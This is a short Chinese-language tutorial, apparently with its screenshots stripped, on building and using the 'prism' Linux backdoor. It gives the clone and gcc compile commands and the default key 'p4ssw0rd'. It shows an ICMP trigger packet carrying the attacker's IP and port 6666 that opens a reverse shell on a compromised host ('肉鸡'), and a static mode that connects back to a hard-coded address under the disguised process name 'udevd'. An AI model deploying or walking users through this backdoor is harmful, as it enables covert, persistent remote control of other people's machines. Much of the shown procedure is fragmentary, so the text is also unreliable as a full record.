支持平台
功能
项目地址
git clone https://github.com/andreafabrizi/prism.git
编译
gcc <..OPTIONS..> -Wall -s -o prism prism.c
选项如下:
ICMP模式
使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活。
可以修改密钥,默认是p4ssw0rd
可以看到模式为icmp
攻击机(172.16.100.182):
肉鸡(172.16.100.134):
攻击机(172.16.100.182):
发送icmp包
内容如下:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
然后获得Shell。
STATIC模式
后门尝试连接硬编码的IP:PORT
可以看到自定义进程名称为udevd
重新编译
攻击机(172.16.100.182):
肉鸡(172.16.100.134):
查看进程
获得Shell
